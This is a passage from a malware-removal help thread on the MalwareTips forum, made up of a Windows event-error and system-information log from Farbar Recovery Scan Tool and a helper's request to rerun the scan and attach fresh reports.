Faulting application start time: 0x01d3741dbf845230
Faulting application path: C:\Program Files\VIPRE\VIPREUI.exe
Faulting module path: C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\8f60f287a302618931fadffc35cacedd\PresentationCore.ni.dll
Report Id: 0c5217f0-e011-11e7-a3b3-002197c3e0a9

Error: (12/13/2017 06:21:20 AM) (Source: MsiInstaller) (EventID: 10005) (User: sheri-PC)
Description: Product: Windows Defender -- You do not need to install this software because Windows Defender is included in Windows Vista. You can access Windows Defender from the Security section of the Windows Control Panel.

Error: (12/13/2017 06:20:29 AM) (Source: MsiInstaller) (EventID: 10005) (User: sheri-PC)
Description: Product: Windows Defender -- You do not need to install this software because Windows Defender is included in Windows Vista. You can access Windows Defender from the Security section of the Windows Control Panel.

Error: (12/13/2017 06:17:28 AM) (Source: MsiInstaller) (EventID: 10005) (User: sheri-PC)
Description: Product: Windows Defender -- You do not need to install this software because Windows Defender is included in Windows Vista. You can access Windows Defender from the Security section of the Windows Control Panel.

Error: (12/13/2017 06:14:02 AM) (Source: MsiInstaller) (EventID: 10005) (User: sheri-PC)
Description: Product: Windows Defender -- You do not need to install this software because Windows Defender is included in Windows Vista. You can access Windows Defender from the Security section of the Windows Control Panel.

Error: (12/13/2017 06:03:44 AM) (Source: MsiInstaller) (EventID: 10005) (User: sheri-PC)
Description: Product: Windows Defender -- You do not need to install this software because Windows Defender is included in Windows Vista. You can access Windows Defender from the Security section of the Windows Control Panel.

Error: (12/13/2017 05:12:37 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (12/13/2017 06:29:23 AM) (Source: BROWSER) (EventID: 8032) (User: )
Description: The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_{FB7B3318-7CD1-4E4D-887C-1D71C5647D83}.
The backup browser is stopping.

Error: (12/13/2017 06:27:09 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Agere Modem Call Progress Audio service failed to start due to the following error:
The system cannot find the file specified.

Error: (12/13/2017 05:16:19 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {FE7E09CE-BBF4-4698-8BC1-37C9002DAA43} did not register with DCOM within the required timeout.

Error: (12/13/2017 05:16:26 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The VIPRE Advanced Security service hung on starting.

Error: (12/13/2017 05:11:12 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Agere Modem Call Progress Audio service failed to start due to the following error:
The system cannot find the file specified.

Error: (12/13/2017 05:10:45 AM) (Source: volmgr) (EventID: 46) (User: )
Description: Crash dump initialization failed!

Error: (12/13/2017 05:09:58 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The UPnP Device Host service failed to start due to the following error:
The service did not start due to a logon failure.

Error: (12/13/2017 05:09:58 AM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The upnphost service was unable to log on as NT AUTHORITY\LocalService with the currently configured password due to the following error:
The security account manager (SAM) or local security authority (LSA) server was in the wrong state to perform the security operation.


To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (12/13/2017 05:09:58 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1069" attempting to start the service upnphost with arguments "" in order to run the server:
{204810B9-73B2-11D4-BF42-00B0D0118B56}

Error: (12/13/2017 04:52:06 AM) (Source: BROWSER) (EventID: 8032) (User: )
Description: The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_{FB7B3318-7CD1-4E4D-887C-1D71C5647D83}.
The backup browser is stopping.


==================== Memory info ===========================

Processor: AMD Athlon(tm) Dual Core Processor 4050e
Percentage of memory in use: 46%
Total physical RAM: 2942.49 MB
Available physical RAM: 1578.47 MB
Total Virtual: 5884.98 MB
Available Virtual: 4243.93 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:297.99 GB) (Free:245.13 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: C9EED053)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=298 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================
 

TwinHeadedEagle

Level 41
Verified
Mar 8, 2013
22,627
Hello,


FRST.gif
Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool to give me a fresh look at your system.
  • Right-click on
    FRST.gif
    icon and select
    RunAsAdmin.jpg
    Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Make sure that Addition.txt option is checked.

    2873ryc.png

  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.
Please attach report into your next reply.
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top